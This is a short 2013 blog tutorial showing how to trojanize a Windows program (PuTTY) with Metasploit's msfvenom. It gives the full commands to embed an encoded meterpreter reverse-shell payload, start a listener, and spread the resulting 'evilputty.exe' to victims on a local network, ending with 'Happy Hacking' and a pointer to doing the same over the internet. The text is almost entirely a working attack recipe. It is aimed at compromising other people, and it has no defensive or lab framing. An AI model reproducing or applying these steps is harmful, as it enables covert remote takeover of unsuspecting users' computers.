Friday, 16 August 2013

How To Backdoor Windows Executables Using Metasploit's Plugin Msfvenom


In this tutorial, i will show you how to backdoor windows executables using Metasploit Exploitation Framework's plugin Msfvenom.

For LAN/Wifi Networks:

Now follow me step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1- Open terminal and download putty using wget.

wget http://the.earth.li/~sgtatham/putty/0.63/x86/putty.exe

2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/putty.exe LHOST=192.168.0.14 LPORT=4444 > evilputty.exe

Above command will generate an EXE file with the name evilputty.exe. This is our backdoored executable file.
3- Start metasploit.

msfconsole

4- Start metasploit's reverse handler to get a reverse connection.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit


5- Distribute this evilputty.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilputty.exe , you will get a reverse shell on your metasploit's handler. Happy Hacking :)

For WAN Or Internet:

To use this method over WAN/Internet, you need to forward your ports.
Follow my following tutorial for better understanding of metasploit's working over internet.

Hacking Remote Machines Using Firefox Bootstrapped Addon Of Metasploit Over WAN (Internet)

Author:
Captain & exploiter-z from Pak Mad Hunters

Watch Video Tutorial: